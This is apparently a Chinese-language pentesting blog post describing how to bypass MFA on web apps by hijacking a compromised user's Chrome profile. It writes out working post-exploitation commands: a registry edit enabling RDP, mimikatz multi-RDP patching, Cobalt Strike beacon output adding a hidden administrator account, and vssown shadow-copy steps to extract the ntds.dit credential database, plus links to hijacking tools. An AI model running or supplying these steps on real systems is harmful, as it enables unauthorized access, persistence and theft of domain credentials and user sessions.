0X01 哪里會遇到這些問題?
在平時的滲透中 我們難免會遇到很多關於browser的問題 such as : cs\admin login in 有MFA保護的web程序 我們此時不能dump密碼來解決了 那該怎么辦???
0X02解決辦法
當對方是chrome時候
0x01這時候我們可以 rdp多開 然后chrome配置文件劫持來達到我們的目的
當對方是iexplore.exe我們可以
0x02使攻擊者可以用自己的瀏覽器通過目標的瀏覽器中繼請求。這使攻擊者可以以目標用戶的身份與應用網站進行靜默交互、實現后滲透目標
0X03復現過程
0x01在chrome中實現劫持
模擬環境(ps:固態還沒有回來所以先用工作中把哈哈) win10 pc workgroup liunx cs客戶端 win 7 cs
假設環境 我們得到了一台pc權限 想進一步滲透郵件 但是有MFA 我們假設qq.com就有MFA
目標在PC能被我們隨意控制(這里我們由於是本機 直接不注入進程了 windows exe直接開始進行實驗)
接下來我們需要去實現 登錄localhost用戶的pronmail賬戶 不需要密碼
前提 0x01編譯一個 3389 more open 無視文件block dump出chorm配置
這里用戶多開我們用mimikatz直接解決
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f privilege::debug ts::multirdp(ps:dll那個我一直編譯不成功 我太菜了 作者調用了別人一個庫的文件 沒告訴我們 我實在找不到了)
最后pyc++爺爺終於編譯好了 但是 我個人覺得 相比mimitakz在內存里面修改 起來 這個直接改dll實在是過於危險
so 最終還是獼猴桃香
beacon> shell net user admin P@ssw0rd /add [*] Tasked beacon to run: net user admin P@ssw0rd /add [+] host called home, sent: 75 bytes [+] received output: 命令成功完成。 beacon> shell net localgroup administrators admin /add [*] Tasked beacon to run: net localgroup administrators admin /add [+] host called home, sent: 71 bytes [+] received output: 命令成功完成。
對於文件被鎖定的情況 我們在導出ntds.dit的時候就遇到文件被鎖定的情況 bypass方法很多
這里我用vssown來解決的
vssown 與vssadmin程序類似,Tim Tomes開發了vssown,它是一個可視化的基本腳本,可以創建和刪除卷影副本,從卸載的卷影副本運行任意可執行文件,以及啟動和停止卷影復制服務。 cscript vssown.vbs /start cscript vssown.vbs /create c cscript vssown.vbs /list cscript vssown.vbs /delete
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\ntds\ntds.dit C:\vssown
github https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs好的接下來我們開始操作
看到我們session已經成功劫持
參考 https://xz.aliyun.com/t/4417 http://blog.leanote.com/post/snowming/4e07af1cab60 https://github.com/ThunderGunExpress/ThunderChrome https://xz.aliyun.com/t/2527#toc-6